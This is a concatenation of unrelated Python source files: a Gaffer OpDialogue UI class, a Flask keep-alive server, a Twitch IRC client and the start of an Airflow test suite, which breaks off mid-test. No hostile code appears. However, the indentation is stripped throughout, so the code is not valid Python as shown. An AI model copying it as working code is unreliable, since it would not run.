# and may return True to cancel execution, or False to
# allow it to continue.
def preExecuteSignal( self ) :
return self.__preExecuteSignal
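# A minimal example slot (names are illustrative, not part of this file) :
#
#   def confirmExecution( dialogue ) :
#       # returning True cancels execution, False lets it continue
#       return not userHasConfirmed
#
#   connection = dialogue.preExecuteSignal().connect( confirmExecution )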
## Signal emitted after executing the Op.
# Slots should have the signature `slot( opDialogue, result )`.
def postExecuteSignal( self ) :
return self.__postExecuteSignal
## A signal called when the user has pressed the execute button
# and the Op has been successfully executed. This is passed the
# result of the execution.
## \deprecated Use postExecuteSignal() instead.
def opExecutedSignal( self ) :
return self.__opExecutedSignal
## Returns the internal MessageWidget used for displaying messages
# output by the Op.
def messageWidget( self ) :
return self.__messageWidget
## Causes the dialogue to enter a modal state, returning the result
# of executing the Op, or None if the user cancelled the operation. Any
# validation or execution errors will be reported to the user and return
# to the dialogue for them to cancel or try again.
def waitForResult( self, **kw ) :
self.__resultOfWait = None
self.setModal( True, **kw ) # will return when the dialogue is closed
return self.__resultOfWait
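# Typical modal usage (a sketch, assuming an existing IECore.Op instance "op") :
#
#   dialogue = OpDialogue( op, executeInBackground = True )
#   result = dialogue.waitForResult()
#   if result is not None :
#       pass # the op succeeded and "result" holds its return value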
def _acceptsClose( self ) :
# we mustn't allow the window to be closed while
# the op is running in the background.
return self.__state != self.__State.Execution
__State = IECore.Enum.create( "ParameterEditing", "Execution", "ErrorDisplay", "ResultDisplay" )
def __initiateParameterEditing( self, *unused ) :
self.__backButton.setText( "Cancel" )
self.__backButton.setEnabled( True )
self.__backButton.setVisible( True )
self.__backButtonClickedConnection = self.__backButton.clickedSignal().connect( 0, Gaffer.WeakMethod( self.__close ) )
executeLabel = "OK"
with IECore.IgnoredExceptions( KeyError ) :
executeLabel = self.__node.getParameterised()[0].userData()["UI"]["buttonLabel"].value
self.__forwardButton.setText( executeLabel )
self.__forwardButton.setEnabled( True )
self.__forwardButton.setVisible( True )
self.__forwardButtonClickedConnection = self.__forwardButton.clickedSignal().connect( 0, Gaffer.WeakMethod( self.__initiateExecution ) )
self.__frame.setChild( self.__parameterEditingUI )
self.__focusDefaultButton()
self.__state = self.__State.ParameterEditing
# when we first display our parameters, we want to ensure that the window
# is big enough to fit them nicely. we don't do this the next time we show
# the parameters, because the user may have deliberately resized the window.
if not self.__haveResizedToFitParameters :
self.resizeToFitChild( shrink = False )
self.__haveResizedToFitParameters = True
def __close( self, *unused ) :
self.__state = self.__State.ParameterEditing
self.close()
def __initiateExecution( self, *unused ) :
if self.preExecuteSignal()( self ) :
return
self.__progressIconFrame.setChild( GafferUI.BusyWidget() )
self.__progressLabel.setText( "<h3>Processing...</h3>" )
self.__backButton.setEnabled( False )
self.__backButton.setText( "Cancel" )
self.__forwardButton.setVisible( False )
self.__messageWidget.clear()
self.__messageCollapsible.setCollapsed( True )
self.__state = self.__State.Execution
if self.__executeInBackground :
self.__frame.setChild( self.__progressUI )
threading.Thread( target = self.__execute ).start()
else :
# we don't display progress when we're not threaded,
# because we have no way of updating it.
self.__execute()
def __execute( self ) :
try :
self.__node.setParameterisedValues()
with self.__messageWidget.messageHandler() :
result = self.__node.getParameterised()[0]()
except Exception, e :
result = sys.exc_info()
if self.__executeInBackground :
GafferUI.EventLoop.executeOnUIThread( IECore.curry( self.__finishExecution, result ) )
else :
# We're being called on the main gui thread, most likely from a button click on
# the forward button. If we called __finishExecution() immediately, it would add
# new slots to the button click signal, and these would be executed immediately
# for the _current_ click - this is not what we want! So we defer __finishExecution
# to the next idle event, when the current click is a thing of the past.
## \todo The documentation for boost::signals2 seems to imply that it has a different
# behaviour, and that slots added during signal emission are ignored until the next
# emission. If we move to using signals2, we may be able to revert this change.
GafferUI.EventLoop.addIdleCallback( IECore.curry( self.__finishExecution, result ) )
def __finishExecution( self, result ) :
if isinstance( result, IECore.Object ) :
if self.getModal() :
self.__resultOfWait = result
self.__initiateResultDisplay( result )
self.opExecutedSignal()( result )
self.postExecuteSignal()( self, result )
else :
self.__initiateErrorDisplay( result )
return False # remove idle callback
def __initiateErrorDisplay( self, exceptionInfo ) :
self.__progressIconFrame.setChild( GafferUI.Image( "failure.png" ) )
self.__progressLabel.setText( "<h3>Failed</h3>" )
self.__messageCollapsible.setCollapsed( False )
self.__backButton.setVisible( True )
self.__backButton.setText( "Cancel" )
self.__backButton.setEnabled( True )
self.__backButtonClickedConnection = self.__backButton.clickedSignal().connect( Gaffer.WeakMethod( self.__close ) )
self.__forwardButton.setVisible( True )
self.__forwardButton.setText( "Retry" )
self.__forwardButton.setEnabled( True )
self.__forwardButtonClickedConnection = self.__forwardButton.clickedSignal().connect( Gaffer.WeakMethod( self.__initiateParameterEditing ) )
self.__messageWidget.messageHandler().handle(
IECore.Msg.Level.Debug,
"Python Traceback",
"".join( traceback.format_exception( *exceptionInfo ) )
)
self.__messageWidget.messageHandler().handle(
IECore.Msg.Level.Error,
"Problem Executing {opName}".format( opName=self.__node.getParameterised()[0].typeName() ),
str( exceptionInfo[1] ),
)
self.__frame.setChild( self.__progressUI )
self.__forwardButton._qtWidget().setFocus()
self.__state = self.__State.ErrorDisplay
def __initiateResultDisplay( self, result ) :
# Although we computed a result successfully, there may still be minor problems
# indicated by messages the Op emitted - check for those.
problems = []
for level in ( IECore.Msg.Level.Error, IECore.Msg.Level.Warning ) :
count = self.__messageWidget.messageCount( level )
if count :
problems.append( "%d %s%s" % ( count, IECore.Msg.levelAsString( level ).capitalize(), "s" if count > 1 else "" ) )
if not problems :
# If there were no problems, then our post execute behaviour may
# indicate that we don't need to display anything - deal with
# those cases.
if self.__postExecuteBehaviour == self.PostExecuteBehaviour.Close :
self.__close()
return
elif self.__postExecuteBehaviour == self.PostExecuteBehaviour.None :
self.__initiateParameterEditing()
return
# Either the post execute behaviour says we should display the result, or we're
# going to anyway, because we don't want the problems to go unnoticed.
self.__progressIconFrame.setChild(
GafferUI.Image( "successWarning.png" if problems else "success.png" )
)
completionMessage = "Completed"
if problems :
completionMessage += " with " + " and ".join( problems )
self.__messageCollapsible.setCollapsed( False )
self.__progressLabel.setText( "<h3>" + completionMessage + "</h3>" )
self.__messageWidget.messageHandler().handle( IECore.Msg.Level.Info, "Result", str( result ) )
self.__backButton.setText( "Close" )
self.__backButton.setEnabled( True )
self.__backButton.setVisible( True )
self.__backButtonClickedConnection = self.__backButton.clickedSignal().connect( Gaffer.WeakMethod( self.__close ) )
self.__forwardButton.setText( "Again!" )
self.__forwardButton.setEnabled( True )
self.__forwardButton.setVisible( True )
self.__forwardButtonClickedConnection = self.__forwardButton.clickedSignal().connect( Gaffer.WeakMethod( self.__initiateParameterEditing ) )
if self.__postExecuteBehaviour in ( self.PostExecuteBehaviour.DisplayResultAndClose, self.PostExecuteBehaviour.Close ) :
self.__forwardButton.setVisible( False )
self.__frame.setChild( self.__progressUI )
self.__backButton._qtWidget().setFocus()
self.__state = self.__State.ResultDisplay
def __focusDefaultButton( self ) :
defaultButton = self.__defaultButton
if defaultButton == self.DefaultButton.FromUserData :
defaultButton = self.DefaultButton.OK
d = None
with IECore.IgnoredExceptions( KeyError ) :
d = self.__node.getParameterised()[0].userData()["UI"]["defaultButton"]
if d is not None :
for v in self.DefaultButton.values() :
if str( v ).lower() == d.value.lower() :
defaultButton = v
break
if defaultButton == self.DefaultButton.None :
self._qtWidget().setFocus()
elif defaultButton == self.DefaultButton.Cancel :
self.__backButton._qtWidget().setFocus()
else :
self.__forwardButton._qtWidget().setFocus()
def __messageCollapsibleStateChanged( self, collapsible ) :
if not collapsible.getCollapsed() :
# make the window bigger to better fit the messages, but don't make
# it any smaller than it currently is.
self.resizeToFitChild( shrink = False )
# remove our connection - we only want to resize the first time we
# show the messages. after this we assume that if the window is smaller
# it is because the user has made it so, and wishes it to remain so.
self.__messageCollapsibleStateChangedConnection = None
def __setUserDefaults( self, graphComponent ) :
if isinstance( graphComponent, Gaffer.Plug ) and hasattr( graphComponent, "getValue" ) :
with IECore.IgnoredExceptions( Exception ) :
Gaffer.Metadata.registerPlugValue( graphComponent, "userDefault", graphComponent.getValue() )
for child in graphComponent.children() :
self.__setUserDefaults( child )
|
keep_alive.py
|
from flask import Flask
from threading import Thread
app = Flask('')
@app.route('/')
def home():
return "Hello. I am alive!"
def run():
app.run(host='0.0.0.0',port=8080)
def keep_alive():
t = Thread(target=run)
t.start()
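# Typical usage from the main script (a sketch; "bot" and "TOKEN" are assumptions
# defined elsewhere, e.g. a discord.py client and its token):
#
#   from keep_alive import keep_alive
#   keep_alive()     # start the Flask server on port 8080 in a background thread
#   bot.run(TOKEN)   # then enter the blocking main loop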
|
irc.py
|
import datetime
import re
import select
import socket
import threading
import time
from pytwitchirc.event import Event, CurrentEvent
class IRC:
def __init__(self, nickname: str, oauth: str, host='irc.chat.twitch.tv', port=6667,
log_settings=(0, 0, 0, 0), throttle=20, log_file=None, how_many=5, max_try=5):
"""
:param nickname: lowercase twitch username of the bot
:param oauth: chat authentication key. Can be found on twitchapps.com/tmi
:param host: twitch server to connect with
:param port: twitch server port to connect with
:param log_settings: [notice, warning, received, send] flags controlling which categories are logged
:param throttle: maximum number of messages per 30 seconds
:param log_file: path to the desired log file
:param how_many: maximum number of new connections per run loop
:param max_try: maximum number of attempts before aborting a channel join
"""
self.__nickname = nickname.lower()
self.__oauth = oauth
self.__host = host
self.__port = port
self.__log_settings = log_settings
self.__throttle = throttle
self.__log_file = log_file
self.__how_many = how_many
self.__max_try = max_try
self.__socket = None
self.__buffer = b''
self.__last_ping = time.time()
self.__event = CurrentEvent()
self.__event_sent_date = []
self.__event_buffer = []
self.__received_event = []
self.__status = -1
self.channels = {}
self.__channels_to_part = []
self.__channels_to_join = []
self.__to_join = []
self.__to_part = []
self.__to_send = []
self.__capabilities_acknowledged = {
"twitch.tv/tags": False,
"twitch.tv/commands": False,
"twitch.tv/membership": False
}
# Map of events with callback method
self.__callbacks = [
{
'type': 'PING',
'method': self.__send_pong,
'args': []
},
{
'type': 'PONG',
'method': self.__on_pong_handler,
'args': []
},
{
'type': 'CAP',
'method': self.__on_cap_handler,
'args': [self.__event]
},
{
'type': '376',
'method': self.__set_status,
'args': [2]
},
{
'type': 'JOIN',
'method': self.__on_join_handler,
'args': [self.__event]
},
{
'type': 'PART',
'method': self.__on_part_handler,
'args': [self.__event]
},
{
'type': '353',
'method': self.__on_353_handler,
'args': [self.__event]
},
{
'type': 'RECONNECT',
'method': self.__init_connection,
'args': []
}
]
# Starting a parallel thread to keep the IRC client running
__thread = threading.Thread(target=self.__run, args=())
__thread.daemon = True
__thread.start()
time.sleep(1)
def __run(self):
while True:
try:
self.__init_connection()
while True:
# check connection status
if self.__is_timed_out():
self.__warning('Client has not received a ping for too long')
raise socket.timeout
# # [test] keep the connection alive
# self.__send_ping()
# __parse all received messages
self.__process_socket()
except socket.gaierror:
self.__reset_connection("Gaierror raised. Trying to reconnect.")
except socket.timeout:
self.__reset_connection("Timeout Error raised. Trying to reconnect.")
except ConnectionResetError:
self.__reset_connection("ConnectionResetError raised. Trying to reconnect.")
except BrokenPipeError:
self.__reset_connection("BrokenPipeError raised. Trying to reconnect.")
except OSError as e:
self.__reset_connection("OSError raised : {} . Trying to reconnect.".format(e.strerror))
print(e.args)
def __process_socket(self):
self.__receive_data()
while len(self.__event_buffer) > 0:
tmp = self.__event_buffer.pop(0)
try:
event = self.__parse(tmp)
self.__event.update(event)
self.__check_callback()
if self.__status == 3:
self.__received_event.append(event)
except Exception as e:
print(tmp, file=open("errors.txt", "a"))
print(e)
print(e.args)
self.__warning("appended an error to errors.txt")
self.__warning(tmp)
if self.__status == 3:
# connect scheduled channels
if len(self.__to_join) > 0:
# retrieve the first channel to join
item = self.__to_join.pop(0)
channel = item[0]
counter = item[1]
timestamp = item[2]
# if the last try is below 5s old or the socket is throttling
if time.time() - timestamp < 5 or not self.__socket_locked():
self.__to_join.append((channel, counter, timestamp))
# else if the counter is below max_try
elif counter < self.__max_try:
# send the join request
self.__request_join(channel)
# add back to the list
counter += 1
self.__to_join.append((channel, counter, time.time()))
# send scheduled messages
self.__send_message()
# disconnect scheduled channels
if len(self.__to_part) > 0:
# retrieve the first channel to part
item = self.__to_part.pop(0)
channel = item[0]
counter = item[1]
timestamp = item[2]
# if the last try is below 5s old or the socket is throttling
if time.time() - timestamp < 5 or not self.__socket_locked():
self.__to_part.append((channel, counter, timestamp))
# else if the counter is below max_try
elif counter < self.__max_try:
# send the part request
self.__request_part(channel)
# add back to the list
counter += 1
self.__to_part.append((channel, counter, time.time()))
else:
self.__warning('Failed to part channel {}'.format(channel))
def __init_connection(self):
self.__connect()
self.list_all_channels_to_reconnect()
def __reset_connection(self, warn=None):
# print the warning if needed
if warn:
self.__warning(warn)
# emptying the buffer
self.__buffer = b''
# emptying the channel list
channels = list(self.channels)
self.channels.clear()
for channel in channels:
self.join(channel)
print(len(self.channels))
# reset status variables
self.__last_ping = time.time()
self.__socket = None
for key in self.__capabilities_acknowledged:
self.__capabilities_acknowledged[key] = False
self.__set_status(-1)
def __connect(self):
# setup the connection
self.__open_socket()
self.__connect_socket()
self.__send_pass()
self.__send_nickname()
# request all the IRC capabilities
self.__request_capabilities("twitch.tv/commands")
self.__request_capabilities("twitch.tv/tags")
self.__request_capabilities("twitch.tv/membership")
def __check_callback(self):
for handlers in self.__callbacks:
if self.__event.type == handlers['type']:
handlers['method'](*handlers['args'])
def __set_status(self, status):
if status == -1 and self.__status != -1:
self.__warning('STATUS : -1 - No socket')
elif status == -1 and self.__status == 3:
self.__warning('STATUS : -1 - Socket died')
elif status == 0:
self.__notice('STATUS : 0 - Socket opened')
elif status == 1:
self.__notice('STATUS : 1 - Socket connected')
elif status == 2:
self.__notice('STATUS : 2 - Socket authenticated')
elif status == 3:
self.__notice('STATUS : 3 - Socket ready, buffering messages')
self.__status = status
# get all received events and clear the event buffer
def get_event(self) -> list:
events = self.__received_event
self.__received_event = []
return events
"""
Handlers
"""
# notify cap ack
def __on_cap_handler(self, event) -> None:
try:
# store the cap state
self.__capabilities_acknowledged[event.content] = True
# notify the cap ack
self.__notice('Capability {} got acknowledged'.format(event.content))
# if all cap are ack, set the status to 3 (ready)
if self.__capabilities_acknowledged['twitch.tv/membership'] and \
self.__capabilities_acknowledged['twitch.tv/tags'] and \
self.__capabilities_acknowledged['twitch.tv/commands']:
self.__set_status(3)
except KeyError:
self.__warning('Unsupported Cap Ack received : {}'.format(event.content))
# fetch chatter names
def __on_353_handler(self, event) -> None:
for chatter in event.content.split(' '):
self.channels[event.channel].append(chatter)
# notify a successful connection or a chatter joining
def __on_join_handler(self, event) -> None:
# if the author is the client
if event.author == self.__nickname:
self.__notice('Successfully connected to {}'.format(event.channel))
self.channels[event.channel] = []
for i in range(0, len(self.__to_join)):
if self.__to_join[i][0] == event.channel:
self.__to_join.pop(i)
break
# if the author is a chatter
else:
self.channels[event.channel].append(event.author)
# notify a channel disconnection or a chatter leaving
def __on_part_handler(self, event) -> None:
# if triggered by the client
if event.author == self.__nickname:
try:
self.channels.pop(event.channel)
self.__notice('Successfully disconnected from {}'.format(event.channel))
except KeyError:
self.__notice('Parted channel {channel}, '
'but it wasn\'t in the connected channel list'.format(**event.__dict__))
# if triggered by another chatter
else:
try:
self.channels[event.channel].remove(event.author)
except ValueError:
self.__notice('User {author} disconnected from {channel}, '
'but wasn\'t connected'.format(**event.__dict__))
# notify a pong reception
def __on_pong_handler(self) -> None:
self.__notice('Pong received, connection is still alive')
"""
socket
"""
def __open_socket(self) -> None:
self.__socket = socket.socket()
self.__set_status(0)
def __connect_socket(self) -> bool:
try:
self.__socket.connect((self.__host, self.__port))
self.__socket.setblocking(0)
self.__notice('Connected to {0[0]}:{0[1]}'.format(self.__socket.getpeername()))
self.__set_status(1)
return True
except socket.gaierror:
self.__warning('Unable to connect.')
return False
# fetch data from the socket
def __receive_data(self):
# try to retrieve data from socket, timeout if nothing for .1 second
ready = select.select([self.__socket], [], [], 0.1)
if not ready[0]:
return
# read up to 4096 bytes from the socket, append to the buffer, then split into events
self.__buffer += self.__socket.recv(4096)
events = self.__buffer.split(b'\r\n')
self.__buffer = events.pop()
# append all the events to the event buffer
for event in events:
decoded = event.decode("utf-8")
self.__packet_received(decoded)
self.__event_buffer.append(decoded)
"""
channels management
"""
# send a channel connection request
def __request_join(self, channel: str):
if self.__wait_for_status():
self.__send('JOIN #{}\r\n'.format(channel), ignore_throttle=1)
# send a channel disconnection request
def __request_part(self, channel: str):
if channel in self.channels and self.__wait_for_status():
self.__send('PART #{}\r\n'.format(channel), ignore_throttle=1)
# rejoin all known channels
def list_all_channels_to_reconnect(self):
channels_to_reconnect = []
for channel in self.__to_join:
channels_to_reconnect.append((channel[0], 0, time.time() - 5))
for channel in self.channels:
channels_to_reconnect.append((channel, 0, time.time() - 5))
self.__to_join = channels_to_reconnect
self.channels = {}
# request channel join
def join(self, channel: str):
channels = list(self.channels)
if channel not in channels:
self.__to_join.append((channel, 0, time.time()-5))
else:
self.__warning('Already connected to channel {}, connection aborted'.format(channel))
# request channel part
def part(self, channel: str):
channels = list(self.channels)
scheduled_channels_connection = [item[0] for item in self.__to_join]
if channel in channels or channel in scheduled_channels_connection:
self.__to_part.append((channel, 0, time.time()-5))
else:
self.__warning('Not connected to channel {}, unable to disconnect'.format(channel))
"""
sending methods
"""
# todo rename this method
# Lock __send if throttling
def __socket_locked(self):
"""
:rtype: bool
:return: False if the client is currently throttling (send limit reached), True otherwise
"""
# while the eldest event in the history is older than 30s
while len(self.__event_sent_date) > 0 and (time.time() - self.__event_sent_date[0]) > 30:
# pop the eldest event
self.__event_sent_date.pop(0)
# if throttling return false
return not (len(self.__event_sent_date) > self.__throttle)
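# Worked example: with the default throttle of 20, once more than 20 send
# timestamps fall inside the trailing 30 s window this returns False, and
# __send_message() stops draining __to_send until old timestamps expire.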
# send a packet and log it[, obfuscate after a certain index][, ignore the throttling cap]
def __send(self, packet, obfuscate_after=None, ignore_throttle=0):
# verify throttling status
if self.__socket_locked() or ignore_throttle:
# verify socket instance
if self.__wait_for_status(0):
self.__socket.send(packet.encode('UTF-8'))
self.__event_sent_date.append(time.time())
# mask everything after obfuscate_after with '*' so secrets (e.g. the oauth token) are not logged
if obfuscate_after:
packet_hidden = '*' * (len(packet) - obfuscate_after)
packet = packet[0:obfuscate_after] + packet_hidden
# print to log
self.__packet_sent(packet)
# send a ping acknowledge
def __send_pong(self) -> None:
# update last ping time
self.__last_ping = time.time()
# reply with a pong
self.__send('PONG :tmi.twitch.tv\r\n', ignore_throttle=1)
# log
if not self.__log_settings[2]:
self.__notice('Ping Received. Pong sent.')
# send a ping request
def __send_ping(self) -> None:
# check if the last message was more than 3 min old
if len(self.__event_sent_date) and time.time() - self.__event_sent_date[-1] > 180:
self.__send('PING :tmi.twitch.tv\r\n', ignore_throttle=1)
if not self.__log_settings[2]:
self.__warning('Ping sent.')
def __send_nickname(self):
self.__send('NICK {}\r\n'.format(self.__nickname), ignore_throttle=1)
def __send_pass(self):
self.__send('PASS {}\r\n'.format(self.__oauth), 11, ignore_throttle=1)
# send a message to a channel and prevent sending to disconnected channels
def __send_message(self) -> None:
# if there are messages to send, the socket is ready and the socket is not throttling
if len(self.__to_send) > 0 and self.__wait_for_status() and self.__socket_locked():
# retrieve the first message to send
item = self.__to_send.pop(0)
channel = item[0]
message = item[1]
# if channel not connected, try to connect
if channel not in self.channels:
self.join(channel)
self.__warning('Tried to send to a channel that is not connected, joining the channel first...')
# Listing all messages for the same channel to preserve the sending order
channel_messages = [item]
channel_indexes = []
for i in range(0, len(self.__to_send)):
if channel == self.__to_send[i][0]:
channel_messages.append(self.__to_send[i])
channel_indexes.append(i)
# removing indexes
channel_indexes.reverse()
for indexes in channel_indexes:
self.__to_send.pop(indexes)
# Adding all messages at the end of the list
self.__to_send = self.__to_send + channel_messages
else:
packet = "PRIVMSG #{} :{}\r\n".format(channel, message)
self.__send(packet)
# request the sending of a message
def send(self, channel: str, message: str):
self.__to_send.append((channel, message))
# send an IRC capability request
def __request_capabilities(self, arg: str):
self.__send('CAP REQ :{}\r\n'.format(arg), ignore_throttle=1)
# check IRC time out state
def __is_timed_out(self):
return time.time() - self.__last_ping > 300
def __wait_for_status(self, target=3, timeout=10) -> bool:
# if client not ready wait until ready
if self.__status < target:
while self.__status < target:
self.__warning('Client not ready, current status is {}, expected {};'.format(self.__status, target) +
' {}s left before aborting'.format(timeout))
if self.__status == 2 and target == 3:
for capabilities in self.__capabilities_acknowledged:
if not self.__capabilities_acknowledged[capabilities]:
self.__request_capabilities(capabilities)
timeout -= 1
time.sleep(1)
if timeout < 0:
return False
return True
"""
parsing methods
"""
# wrapper for parsing methods
def __parse(self, event):
try:
event_type = self.__parse_type(event)
channel = self.__parse_channel(event, event_type)
author = self.__parse_author(event)
content = self.__parse_content(event, channel)
tags = self.__parse_tags(event, content)
return Event(event, type=event_type, tags=tags, channel=channel, author=author, content=content)
except Exception as e:
print(e.args)
print(event)
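# Illustrative example of what __parse produces for a typical Twitch PRIVMSG
# line (made-up values, not taken from a live session):
#   raw = "@badge-info=;color=#FF0000 :nick!nick@nick.tmi.twitch.tv PRIVMSG #somechannel :hello world"
#   type    -> 'PRIVMSG'        (first all-uppercase word)
#   channel -> 'somechannel'    (token following ' #')
#   author  -> 'nick'           (between '!' and '@')
#   content -> 'hello world'    (text after '<channel> :')
#   tags    -> {'badge-info': '', 'color': '#FF0000'}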
def __parse_tags(self, event, content):
# Check whether the event carries tags
if event[0] == '@':
# Isolating tags (between '@' and ' :')
tags = event[1:].split(' :')[0]
tags = self.__parse_tags_dict(tags, ';', '=')
# Parsing sub dict (separator : '/' and ',')
for key in tags:
# 'flags' is an undocumented Twitch tag, so it is not processed like the others;
# it appears to mark the spans of the message caught by AutoMod and is parsed as such
if key == 'flags':
flags = tags['flags']
flagged = []
if len(flags):
flags_list = flags.split(',')
for flag in flags_list:
index1 = int(flag.split('-')[0])
index2 = int(flag.split('-')[1].split(':')[0]) + 1
attributes = flag.split(':')[1]
flagged.append({'from': index1,
'to': index2,
'attributes': attributes,
'text': content[index1:index2]})
tags[key] = flagged
elif key == 'msg-param-sub-plan-name':
tags[key] = tags[key].replace('\\s', ' ')
# if the tag contains ':' it's a dict containing lists
elif ':' in tags[key] and '://' not in tags[key]:
tags[key] = self.__parse_tags_dict(tags[key], '/', ':')
for sub_key in tags[key]:
tags[key][sub_key] = self.__parse_list(tags[key][sub_key], ',')
for i in range(0, len(tags[key][sub_key])):
tags[key][sub_key][i] = self.__parse_list(tags[key][sub_key][i], '-')
# if the tag contains '/' it's a dict of numeric values (e.g. badges)
elif '/' in tags[key] and '//' not in tags[key]:
tags[key] = self.__parse_tags_dict(tags[key], ',', '/')
return tags
@staticmethod
def __parse_tags_dict(tag_dict_string: str, separator_a: str, separator_b: str) -> dict:
# Split the tag string into tags (separator_a, e.g. ';')
tag_list = tag_dict_string.split(separator_a)
tag_dict = {}
# Append each key/value pair to a dict (split on separator_b)
for tag in tag_list:
key, value = tag.split(separator_b, 1)
# un-escape potential escaped spaces
value = value.replace('\\s', ' ')
tag_dict[key] = value
return tag_dict
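# Illustrative example (made-up values):
#   __parse_tags_dict("badges=moderator/1,subscriber/12;color=#FF0000", ';', '=')
#   returns {'badges': 'moderator/1,subscriber/12', 'color': '#FF0000'};
#   the 'badges' value is then split further by __parse_tags using ',' and '/'.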
@staticmethod
def __parse_list(list_string, separator):
return list_string.split(separator)
@staticmethod
def __parse_type(event):
split = event.split()
for word in split:
if word.upper() == word:
return word
def __parse_channel(self, event, event_type):
# Channel in a whisper is always the client nickname
if event_type == 'WHISPER':
return self.__nickname
else:
try:
# Channel is prefixed by ' #' and followed by a space
return event.split(' #')[1].split()[0]
except IndexError:
# Some events don't belong to any channels
return None
@staticmethod
def __parse_author(event):
# author is formatted like : ':author!author@author.'
try:
return event.split('!')[1].split('@')[0]
except IndexError:
return None
# unused dev purposes
@staticmethod
def __parse_author_regex(event):
# 2 hours to create search string:
try:
return re.search(r':(.*?)!(\1)@(\1)\.', event).group(1)
except (AttributeError, IndexError):  # re.search returns None when there is no match
return None
@staticmethod
def __parse_content(event, channel):
target = " :"
if channel:
target = channel + target
content = event.split(target, maxsplit=1)
return content[1] if len(content) > 1 else None
"""logging methods"""
def __notice(self, text: str) -> None:
if self.__log_settings[0]:
print('[{}]\33[32m'.format(datetime.datetime.now()) + text + '\33[0m')
self.__log_to_file(text, "NOTE")
def __warning(self, text: str) -> None:
if self.__log_settings[1]:
print('[{}]\33[31m'.format(datetime.datetime.now()) + text + '\33[0m')
self.__log_to_file(text, "WARN")
def __packet_received(self, text: str) -> None:
if self.__log_settings[2]:
print('[{}]\33[36m<'.format(datetime.datetime.now()) + text + '\33[0m')
self.__log_to_file(text, "RCEV")
def __packet_sent(self, text: str) -> None:
if self.__log_settings[3]:
print('[{}]\33[34m>'.format(datetime.datetime.now()) + text.strip("\n") + '\33[0m')
self.__log_to_file(text, "SENT")
def __log_to_file(self, text: str, log_type: str) -> None:
if self.__log_file:
print("[{}][{}]:{}".format(datetime.datetime.now(), log_type, text), file=open(self.__log_file, "a+"))
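# Minimal usage sketch, as referenced in the constructor docstring (the
# nickname, oauth token and channel below are placeholders, and the 0.1 s
# polling interval is an arbitrary choice, not something mandated by this class):
#
#   client = IRC('my_bot_name', 'oauth:xxxxxxxxxxxxxxxx', log_settings=(1, 1, 0, 0))
#   client.join('some_channel')
#   while True:
#       for event in client.get_event():
#           if event.type == 'PRIVMSG':
#               print(event.channel, event.author, event.content)
#       time.sleep(0.1)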
|
core.py
|
# -*- coding: utf-8 -*-
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from __future__ import print_function
import json
import unittest
import bleach
import doctest
import mock
import multiprocessing
import os
import re
import signal
import sqlalchemy
import subprocess
import tempfile
import warnings
from datetime import timedelta
from dateutil.relativedelta import relativedelta
from email.mime.application import MIMEApplication
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
from freezegun import freeze_time
from numpy.testing import assert_array_almost_equal
from six.moves.urllib.parse import urlencode
from time import sleep
from airflow import configuration
from airflow.executors import SequentialExecutor
from airflow.models import Variable
configuration.conf.load_test_config()
from airflow import jobs, models, DAG, utils, macros, settings, exceptions
from airflow.models import BaseOperator
from airflow.operators.bash_operator import BashOperator
from airflow.operators.check_operator import CheckOperator, ValueCheckOperator
from airflow.operators.dagrun_operator import TriggerDagRunOperator
from airflow.operators.python_operator import PythonOperator
from airflow.operators.dummy_operator import DummyOperator
from airflow.hooks.base_hook import BaseHook
from airflow.hooks.sqlite_hook import SqliteHook
from airflow.bin import cli
from airflow.www import app as application
from airflow.settings import Session
from airflow.utils import timezone
from airflow.utils.timezone import datetime
from airflow.utils.state import State
from airflow.utils.dates import infer_time_unit, round_time, scale_time_units
from lxml import html
from airflow.exceptions import AirflowException
from airflow.configuration import AirflowConfigException, run_command
from jinja2.sandbox import SecurityError
from jinja2 import UndefinedError
import six
NUM_EXAMPLE_DAGS = 20
DEV_NULL = '/dev/null'
TEST_DAG_FOLDER = os.path.join(
os.path.dirname(os.path.realpath(__file__)), 'dags')
DEFAULT_DATE = datetime(2015, 1, 1)
DEFAULT_DATE_ISO = DEFAULT_DATE.isoformat()
DEFAULT_DATE_DS = DEFAULT_DATE_ISO[:10]
TEST_DAG_ID = 'unit_tests'
try:
import cPickle as pickle
except ImportError:
# Python 3
import pickle
def reset(dag_id=TEST_DAG_ID):
session = Session()
tis = session.query(models.TaskInstance).filter_by(dag_id=dag_id)
tis.delete()
session.commit()
session.close()
reset()
class OperatorSubclass(BaseOperator):
"""
An operator to test template substitution
"""
template_fields = ['some_templated_field']
def __init__(self, some_templated_field, *args, **kwargs):
super(OperatorSubclass, self).__init__(*args, **kwargs)
self.some_templated_field = some_templated_field
def execute(*args, **kwargs):
pass
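# Note for the template tests below (a hedged summary of Airflow templating,
# not behaviour added by this class): because 'some_templated_field' is listed
# in template_fields, Airflow renders it through Jinja before execute() runs,
# so e.g. some_templated_field='{{ ds }}' reaches execute() as the execution
# date string ('2015-01-01' for DEFAULT_DATE in these tests).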
class CoreTest(unittest.TestCase):
default_scheduler_args = {"num_runs": 1}
def setUp(self):
configuration.conf.load_test_config()
self.dagbag = models.DagBag(
dag_folder=DEV_NULL, include_examples=True)
self.args = {'owner': 'airflow', 'start_date': DEFAULT_DATE}
self.dag = DAG(TEST_DAG_ID, default_args=self.args)
self.dag_bash = self.dagbag.dags['example_bash_operator']
self.runme_0 = self.dag_bash.get_task('runme_0')
self.run_after_loop = self.dag_bash.get_task('run_after_loop')
self.run_this_last = self.dag_bash.get_task('run_this_last')
def test_schedule_dag_no_previous_runs(self):
"""
Tests scheduling a dag with no previous runs
"""
dag = DAG(TEST_DAG_ID + 'test_schedule_dag_no_previous_runs')
dag.add_task(models.BaseOperator(
task_id="faketastic",
owner='Also fake',
start_date=datetime(2015, 1, 2, 0, 0)))
dag_run = jobs.SchedulerJob(**self.default_scheduler_args).create_dag_run(dag)
self.assertIsNotNone(dag_run)
self.assertEqual(dag.dag_id, dag_run.dag_id)
self.assertIsNotNone(dag_run.run_id)
self.assertNotEqual('', dag_run.run_id)
self.assertEqual(
datetime(2015, 1, 2, 0, 0),
dag_run.execution_date,
